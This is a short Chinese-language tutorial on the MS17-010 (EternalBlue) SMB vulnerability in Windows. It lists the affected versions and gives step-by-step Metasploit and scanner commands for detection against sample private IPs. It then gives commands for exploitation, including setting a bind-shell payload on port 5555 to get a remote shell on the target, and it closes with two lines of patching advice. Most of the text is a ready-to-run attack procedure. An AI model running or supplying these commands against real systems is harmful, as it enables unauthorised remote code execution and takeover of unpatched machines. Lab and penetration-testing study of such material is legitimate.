漏洞描述
攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。
影响版本
- Windows Vista
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows 10
- Windows Server 2008 和 Windows Server 2008 R2
- Windows Server 2012 和 Windows Server 2012 R2
- Windows Server 2016
…
漏洞检测
kali
#启动msf
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
#设置目标ip
set rhosts 192.168.234.132
run
提示 Host is likely VULNERABLE to MS17-010
表示存在漏洞
windows
利用工具:
https://github.com/holmesian/ms17_010_scan
单个ip检测:
#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132
多ip扫描:
#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24
漏洞利用
KALI:
#启动msf
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
#设置目标ip
set rhosts 192.168.234.132
run
无公网ip反弹shell
假设你只有一台pc机,无公网ip接受漏洞反弹回来的shell,只需要更改msf的攻击载荷即可
#查看攻击在和
show payloads
#修改攻击载荷为 generic/shell_bind_tcp
set payload 1
#查看配置,我们只需要设置
show options
#设置目标ip
set rhost 192.168.234.134
set lport 5555
run
对于我的理解为 generic/shell_bind_tcp payload 是在目标机子上打开5555端口,我们去进行主动连接获取shell。
而原先使用的 windows/x64/meterpreter/reverse_tcp 是让对方主动连接我们监听的端口
漏洞加固
1、 更新操作系统补丁。
2、 关闭操作系统139、445等多余端口。